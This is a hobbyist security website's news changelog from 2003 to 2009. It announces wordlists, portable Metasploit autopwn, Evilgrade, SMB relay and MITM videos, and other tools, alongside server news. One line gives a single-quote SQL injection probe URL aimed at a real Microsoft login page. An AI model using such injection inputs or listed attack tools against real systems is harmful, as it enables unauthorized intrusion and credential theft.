ADDED packetstorm_dic_john_1337.tar.gz PacketStorm.org wordlist
in 1337 speak
01/12/2009 - UPDATED http://www.rmccurdy.com/m3u.m3u
All port 80 Shoutcast feeds for thos pesky firewalls ! script can be found in
/scripts
01/07/2009 - UPDATED w3af to build 2312 fixed SVN updater and added larger 1meg
pykto (nikto ) DB file.
11/21/2008 - ADDED 2.3GIG wordlist
* theargonlistver2_wordlist.zip (83meg) > .rar(154meg) > .lst ( plan text
1.9gigs)
* ran john on it and sort and uniq
* results in 2.3G wordlist no dupes
* DOWNLOAD:
word.lst.s.u.john.s.u.200.part01.rar
word.lst.s.u.john.s.u.200.part02.rar
word.lst.s.u.john.s.u.200.part03.rar
11/13/2008 - ADDED torrentflux_resume_all.txt
Sick of TF and clicking 900 times to resume all the torrents ? use this ! works
for 2.1
torrentflux_resume_all.txt
* cd to install path
* patch -Np1 < torrentflux_resume_all.txt
* copy the icons form the link below ( or just use ones you already have and
change the source)
* resource: http://www.torrentflux.com/forum/index.php?topic=43.0
11/05/2008 - FIXED w3af_1871_fixed.zip
portable w3af to current build FIXED!
11/03/2008 - ADDED Portable Metasploit with autopwn ! Metasploitportable.exe pawn on the GO ! ( needs admin and
winpcap if you want SYN scans .. )
10/22/2008 - ADDED Medevil Total War 2 MTW2 army ripp script http://tw.rmccurdy.com/
10/21/2008 - UPDATED nikto 2.X nukeit.org and rmccurdy.com sort and uniq 8764
lines! nikto_extra_scans.db
10/08/2008 - UPDATED http://forum.ultravnc.info/viewtopic.php?p=53317#53317
auto reconnect script for ULTRAvnc repeater
09/29/2008 - UPDATES Server was down for a bit for updates removed some
services to increase security
09/23/2008 - ADDED http://rmccurdy.com/scripts/downloaded/gtkUiUsersGuide.pdf
gtk Ui Users Guide for W3AF!
09/18/2008 - ADDED flickr_rip_LARGE
Simple script to ripp flickr images
09/03/2008 - UPDATED feeds.rmccurdy.com
added 2 security feeds securityvulns.com and secunia.com
08/14/2008 - VIDEO: ettercap
/ etterfilter man in the middle ownage
08/14/2008 - myipneighbors.bash.txt myipneighbors > google search for
param to help find exploitable scripts
08/14/2008 - UPDATED: w3af_1632.zip
w3af GUI for windows portable GTK UI update to build 1632
08/11/2008 - Surf Jacking Gmail demonstration.flv Exploiting sites that
use https then http
08/11/2008 - 301 redirect MITM all application request over HTTP So far
I only have luck with FF and Opera
08/09/2008 - sedtris.sed Tetris in sed() By: Julia Jomantaite. Here is
the shell script to hit enter for you sedtris.sh
08/08/2008 - SSH
downgrade attack Old news but news to me.
08/07/2008 - hedgehog
A simple proof-of-concept portscanner written in VBA for Excel.
08/06/2008 - Evilgrade
hijack updaters request !
Implemented modules:
-------------------
- Java plugin
- Winzip
- Winamp
- MacOS
- OpenOffices
- iTunes
- Linkedin Toolbar
- DAP [Download Accelerator]
- notepad++
- speedbit
08/05/2008 - Proxycheck.sh
Updated still lame but it works...
08/04/2008 - Brute
force CSS History Hack Without JavaScript
07/24/2008 - Some issues with the router to the server. Also got a new job.
Still working on cracker.rmccurdy.com trying to compile rcracki
07/10/2008 - http://www.freerainbowtables.com
FYI if you wanted new rainbow tables now is the time they just updated them
lots of seeds !
07/07/2008 - Movies.cgi
Quick way to find good movies that are on DVD
04/23/2008 - Download
BackTrack 3 Final Here!
04/23/2008 - w3af GUI for windows portable GTK UI update to build 1309 w3af_1309.zip Screen Shot
06/17/2008 - Ya so I got owned by lightning had to replace:
* cable modem
* Netgear wifi router
* 3 NICs
total cost ~70$ downtime 5 days
06/09/2008 - Server was down for a bit for some updates
06/05/2008 - Metasploit.com ARP Pwned
06/05/2008 - CYBS cybersource 2008 Fraud Report.pdf
06/04/2008 - Flash
exploit NOT GOOD update flash ASAP ....
06/02/2008 - XSS Cross Site Printing Nice !
06/02/2008 - I am back in town from my little vacation ... I killed my mythbox
but now I have the backups automated and SQLdb backed up offsite!
05/23/2008 - SQL Injection Attack At least 70,000 websites have fallen
prey to an automated SQL injection attack that exploits several
vulnerabilities, including the Microsoft Data Access Components (MDAC)
05/23/2008 - peerguardian Freebsd IPFW script I am on comcast trying to
download a ISO for like 3 days not sure if it is comcast or not ..
05/22/2008 - .htaccess issues resolved
05/20/2008 - Different rings telling the difference between switches by
the sound of the ring
05/20/2008 - gns3
graphical network simulator that allows you to design complex network
topologies and to launch simulations on them
05/17/2008 - SQL Inject via Referer ! This is a new one to me ..
05/14/2008 - "You have received an infraction at Remote Exploit
Forums" next message "I am a fan, and appreciate your Flash Ripping
Tutorial"
05/01/2008 - [VIDEO]
Ripping Flash Templates ! Using URLSnooper / swfdecoder 3 (softlink ) /
wget
05/01/2008 - automatic patch-based exploit generation (APEG)
05/01/2008 - http://www.tp2location.com/
Resolve any Telephone Number to its geographical location.
04/24/2008 - Great ! http://olab2.research.microsoft.com/LoginProcess.asp?Email='&Password=
04/24/2008 - find Setuid world writable files find_setuid.txt
04/23/2008 - w3af GUI for windows portable GTK UI !!! portable w3af.zip
04/18/2008 - New video ripping
with curl cookies and spidermonkey javascript.swf
04/18/2008 - Fusil the
fuzzer Python library used to write fuzzing programs
04/18/2008 - Updated videos.html
04/17/2008 - Proxycheck.sh I could not find a good proxy check tool so
this is my hackjob of a script
04/16/2008 - Wfuzz is a tool designed for bruteforcing Web Applications,
it can be used for finding resources not linked (directories, servlets,
scripts, etc), bruteforce GET and POST parameters for checking different kind
of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters
(User/Password), Fuzzing,etc.
04/07/2008 - I finally got around to updating the support link to reflect my
new position on end-user security.
03/25/2008 - I made this for Strom Carlson with love Random proverbs
generator
03/25/2008 - SMB_RELAY code not using WPAD http://forums.remote-exploit.org/showthread.php?t=12885
03/09/2008 - EH-Net Exclusive: BackTrack 3 Teaser Video download the SWF from www.offensive-security.com
03/09/2008 - Untested Realplayer code http://forums.hackerscenter.com/showthread.php?t=1431
03/09/2008 - w3af gtk user Interface video w3af-gtk-userInterface.mpeg
02/27/2008 - smb_relay exploit with metasploit on a fully patched XP box smb_relay_metasploit.swf
02/26/2008 - Windows login prompt shell using Magnify.exe (WINDOW KEY + U =
shell !) VISTA winlogin_easy_shell.exe
02/25/2008 - Re-visit to WebInspect > nikto 2.X nikto_extra_scans.db
02/20/2008 - Updated Quick Clean to support VISTA! quickclean.exe
02/17/2008 - I have the power !
02/08/2008 - UPDATED feeds.rmccurdy.com
added http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/
02/08/2008 - UPDATED feeds.rmccurdy.com
added custom osvdb RSS feed for full disclosure http://osvdb.org
01/28/2008 - SERVER OUTAGE: Server was out for the longest recored ever 6hrs
the motherboard went bad
01/18/2008 - Boot 30GIG HDD had bad blocks replaced with 160GIG Jan 18 17:48:30
rmccurdy kernel: ad0: TIMEOUT - READ_DMA retrying (1 retry left) LBA=27092023
01/18/2008 - Tiger Team 24K Heist
01/17/2008 - Classic Menu addon for Office 2007 auto installer ! Classic Menu Auto.exe
01/16/2008 - Added Video Google hacking DORKS Wikto Aura
01/16/2008 - I poke fun at "hacker safe" logo from scanalert.com H4CK3R
54F3
01/14/2008 - My first eps of www.hackerpublicradio.org dd_rhelp
01/12/2008 - Looks like snort.org force agent tag ! NICE ! updated script .. SNORT.PHP
12/10/2007 - Hackers In Wonderland
11/29/2007 -
john
--wordlist=Words.lst --rules --stdout
john will 49 x's Multiply wordlist
theargonlistver2_wordlist.zip (83meg) > .rar(154meg) > .lst ( plan text
1.9gigs)
if it were to go through john it would result in a 85gig ~98,558,569,081 line
file..
11/14/2007 - Ping Tunnel
- Send TCP traffic over ICMP
11/14/2007 - Major server updates !
11/09/2007 - Limit
IP downloads in Apache / mod_limitipconn as if mod_bw was not nuff ..
11/08/2007 - Sweet update app for backtrack2 fast-track.py
11/08/2007 - Updated procmon.sfx.exe
run M$'s Procmon with REG key SET filter ( great for looking for monitoring key
value changes !)
11/07/2007 - sidejacking_hamster.swf
VIDEO sweet cookie/sesstion hijack app for M$ ! Errata Security
10/17/2007 - http://www.rhymetorrents.com
Nurd rap classic stuff
10/07/2007 - Updated Videos
08/31/2007 - Added cURL at&t login script cingular login script
08/31/2007 - Added Snort Auto update script cURL script to download latest snort
rules
08/29/2007 - Updated/Fixed Security feeds 13 total feeds with fulldisclosure feeds.rmccurdy.com
08/29/2007 - Added comic feeds http://rmccurdy.com/comics/
08/26/2007 - Little Snort auto update script to learn cURL/POST etc .. www.binrev.com/forums
08/11/2007 - Flash video to use WebInspect on any host ! WebInspect_7.swf
07/28/2007 - Updated Quick Clean to support firefox ! quickclean.exe
07/20/2007 - Updated/Added Milw0rm Videos http://rmccurdy.com/scripts/
07/20/2007 - Random Myspace Jukebox MS.cgi
07/16/2007 - RIP Lappy 2.0 :( Lappy went POOF the chargerboard blew up so now I
have no laptop OR PC.....
07/13/2007 - ALL Sans webcast links updated ! www.sans.org
07/13/2007 - Hack experts exchange
07/13/2007 - Sorry for the down time. I have been having power issues with
the server. I put the UPS 1400 battery backup
on this server so if I have any more problems I know it is the power supply
07/13/2007 - Flash video of ANI exploit over SMTP ani.swf
07/13/2007 - Flash video of SSL MITM attack ( HTTPS man in the middle attack
sniffing 'secure' connections) Whoppix-ssl-mitm.swf
07/10/2007 - Flash video of Metasploit Autopwn video ( windows 2000 box scanned
and owned in seconds ... ) metaspoit autopwn.swf
06/11/2007 - http://proxy.org/proxy.pl?url=http://rmccurdy.com&proxy=random&=+GO+
just change that url to what ever you want to goto anonymously
05/14/2007 - Episode: 239 - Myth TV Today With A Techie
05/10/2007 - NEW SERVER ! Thank you Magee !! Compaq
Presario SR1110NX Desktop PC (2.53 GHz Celeron, 256 MB RAM)
05/08/2007 - Added metasploit 3 autopwn video metaspoit 03 autopwn.swf
05/01/2007 - Added runas SYSTEM script RUNAS_SYSTEM.vbs
05/01/2007 - Added shell code to unicode script shell2uni.sh
05/01/2007 - Added ccleaner /AUTO to quick clean and quick secure clean quickclean.exe
04/26/2007 - Updated quick windows cleaner quickclean.exe
04/16/2007 - XSS Cheat Sheet
04/16/2007 - Episode: 232 - portable apps Today With A Techie
03/22/2007 - PNX
Video's are out!
03/18/2007 - Fixed an error on the html > rss feeds parser I made and added
Frsirt-windows feeds.rmccurdy.com
03/14/2007 - Episode: 217 - Nikto
Today With A Techie
02/17/2007 - PHOTOS ! outerz0ne.rmccurdy.com ( Atlanta con )
02/17/2007 - 600 IRC PROXIES ! irc.rmccurdy.com
( IRC from work over firewall )
02/17/2007 - Episode: 207 - You are being watched Today With A Techie
01/18/2007 - Episode: 192 - htaccess Today With A Techie
12/13/2006 - Updated quickdefender.exe
Audo install script for Windows Defender / pre fixes/patches
11/27/2006 - Chasers - Trojan Horse
11/21/2006 - Bellsouth's DNS was really slow last night for about 6 hrs. My
scripts went haywire
11/16/2006 - Added Lilina
News Aggregator
11/09/2006 - "I was amazed at the results. Of the 20 USB drives we
planted, 15 were found by employees, and all had been plugged into company
computers."
11/03/2006 - Added IBM_EMU_10b.zip Old IBM Keyboard Emulator
11/01/2006 - Updated/Fixed mod_security
10/26/2006 - Ok my video got ban from youtube.com from SPI so here is the new
download WebInspect
Hack
10/26/2006 - Working on sort of a Cyber-CarPool
10/26/2006 - Ripped the basic enum logs for WebInspect and added them to nikto nikto_extra_scans.db
10/26/2006 - Just added mod_security so let me know if you have any problems gotroot
mod_security rules
10/06/2006 - Added Cron updated list of port 80 feeds from shoutcast.com http://www.rmccurdy.com/m3u.m3u
09/25/2006 - Added Aqua Teen Hunger Force ATHF juke box
09/21/2006 - Do not reserve items on ebay ! Read here
09/15/2006 - Added quickdefender.exe Audo install script for Windows Defender
/ pre fixes/patches
09/20/2006 - Updated quicksnort.exe
09/20/2006 - Added bbs_documentary.html BBS Documentary Interview Collection
Today With a
Techie Episode: 157 - SnortSam
Today With a
Techie Episode: 144 - Nessus
Today With a
Techie Episode: 135 - How to Find a Job Online
Today With a
Techie Episode: 130 - UltraVNC
Today With a
Techie Episode: 121 - Real Server
Today With a
Techie Episode: 113 - Newsgroups
09/15/2006 -
Updated Proxy.html
/ google file search
09/14/2006 - Added rand_myspace.php scripts
09/08/2006 - Finally fixed SnortStats link to not show attacks from the server
09/02/2006 - Updated Comcast script
08/18/2006 - My first Video Tutorial on WebInspect Hack
scripts
08/17/2006 - Updated Weather
Channel Monitor scripts
07/24/2006 - Fixed/updated nessus script message me for a free account
07/18/2006 - Added WebCalendar
06/14/2006 - Comcast ON DEMAND full 3000+ listing comcast.php
06/22/2006 - Sans webcast link index www.sans.org
06/13/2006 - Setup Asterisk Hotline 360.382.2193
06/13/2006 - Updated Nikto script to help against IDS systems
06/14/2006 - 1st meet with hackduluth.org
05/04/2006 - Currently researching Google
hacking
05/02/2006 - I am on for May 15th for Twatech Radio
04/25/2006 - Update quickmirc with latest xdcc script ( Scripts )
04/25/2006 - Update Nessus with Nikto ( Scripts )
04/25/2006 - Added Quick Clean Secure with MRUblaster/sdelete ( Scripts )
04/21/2006 - Update Nessus script and yahoo image script ( under script page )
04/18/2006 - Honda Element Commercial No Pinch
04/17/2006 - Coyboy Bebop - Cat On Mars
04/14/2006 - 1st meet with atlhack.org
04/05/2006 - New Starwars Empire at War v1.3 patch !
03/30/2006 - Fixed snort and flushed logs
03/25/2006 - Podcast using reader.google.com
Radio FreeK
America
Security Monkey
T.W.A.T. Radio
Binary
Revolution Radio
Security Now!
Basenetradio.net
LugRadio
Diggnation
Infected
control alt chicken
Linux
Link Tech
03/22/2006
- I got blogged on h0lug.sourceforge.net
!
03/20/2006 - Added Galaxietool database for uni 12 and 13 www.galaxietool.de
11/30/2005 - Upgraded IDS to www.snortsam.net
11/18/2005 - Server did not survive the 5.4 > 6.0 update so I did a new
install on a 7yr old computer
11/04/2005 - Added quicksnort.exe
Quick snort update and auto install snort.org
10/26/2005 - Updated Mindterm
( ssh client )
10/20/2005 - Added bw_mod ( Bandwidth Module ) Updated quickclean.exe and hosts.exe
10/11/2005 - Updated quickclean.exe
09/01/2005 - Updated quicknorton.exe Now AUTO updates !
08/26/2005 - Updated /Support page with new virus definitions in light of
recent activity
08/23/2005 - Register of rmccurdy.com and added /Snortstats Intrusion Detection
System
07/22/2005 - ISP Account temp suspended due to mail script gone bad
07/27/2005 - Added Opt-out page
07/15/2005 - Server down for MORE Upgrades
07/06/2005 - Server down for Upgrades
06/09/2005 - Updates /bt and added Java /SSH Client
05/30/2005 - Server was down a few days. Linksys switch power supply blew up
again so I got a new switch. Updated /bt site
03/23/2005 - Added BT Bit Torrent Help page
03/23/2005 - Updated/Added scripts
03/10/2005 - Added little eye candy
02/24/2005 - Server Down for cleanup
02/21/2005 - Updated Antispam page
10/26/2004 - Server format
03/16/2004 - Added www.daymarerecords.com changed projects layout
01/25/2004 - Added traceroute Perl script to projects
08/29/2003 - Updated projects
07/13/2003 - Updated added 2 sites and changed news page